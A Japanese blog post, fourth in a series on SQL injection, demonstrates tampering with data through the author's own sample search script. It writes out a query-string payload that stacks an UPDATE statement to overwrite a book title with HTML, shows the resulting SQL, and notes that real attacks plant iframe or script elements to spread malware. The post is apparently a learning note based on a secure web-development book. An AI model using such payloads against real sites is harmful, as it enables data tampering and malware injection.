My Photo

« SQLインジェクション その3 | Main | 正規表現メモ »

October 07, 2013

SQLインジェクション その4

関連記事:
SQLインジェクション その1
SQLインジェクション その2
SQLインジェクション その3

SQLインジェクションによるデータの改ざん

SQLインジェクション その1のスクリプトを

author=';UPDATE+books+SET+title%3d'<i>cracked</i>'+WHERE+id%3d'1001'--

というクエリストリングを付けてアクセスすると、データが改ざんされる。
以下のSQLが実行されることが原因である。

SELECT id, title, author, publisher, publisher, date, price
FROM books
WHERE author = '';UPDATE books SET title='<i>cracked</i>' WHERE id='1001'--' ORDER BY id

改ざん後にこのスクリプトで書籍を検索すると、改ざんされた値のHTMLタグが有効になっている。
よって実際の攻撃ではiframe要素やscript要素でマルウェアを感染させたりすることが行われる。

参考文献:体系的に学ぶWebアプリケーションの作り方 4.4.1 SQLインジェクション

体系的に学ぶ 安全なWebアプリケーションの作り方 脆弱性が生まれる原理と対策の実践 体系的に学ぶ 安全なWebアプリケーションの作り方 脆弱性が生まれる原理と対策の実践
徳丸 浩

ソフトバンククリエイティブ  2011-03-03
売り上げランキング : 4070

Amazonで詳しく見る
by G-Tools

« SQLインジェクション その3 | Main | 正規表現メモ »

PHP」カテゴリの記事

セキュリティ」カテゴリの記事

Comments

Post a comment

(Not displayed with comment.)

TrackBack

TrackBack URL for this entry:
http://app.cocolog-nifty.com/t/trackback/26461/58340457

Listed below are links to weblogs that reference SQLインジェクション その4:

« SQLインジェクション その3 | Main | 正規表現メモ »

May 2017
Sun Mon Tue Wed Thu Fri Sat
  1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31      
無料ブログはココログ

日本blog村

  • にほんブログ村 IT技術ブログへ
  • にほんブログ村 アニメブログへ
  • にほんブログ村 サッカーブログ アルビレックス新潟へ

好きな音楽家

メモ

XI-Prof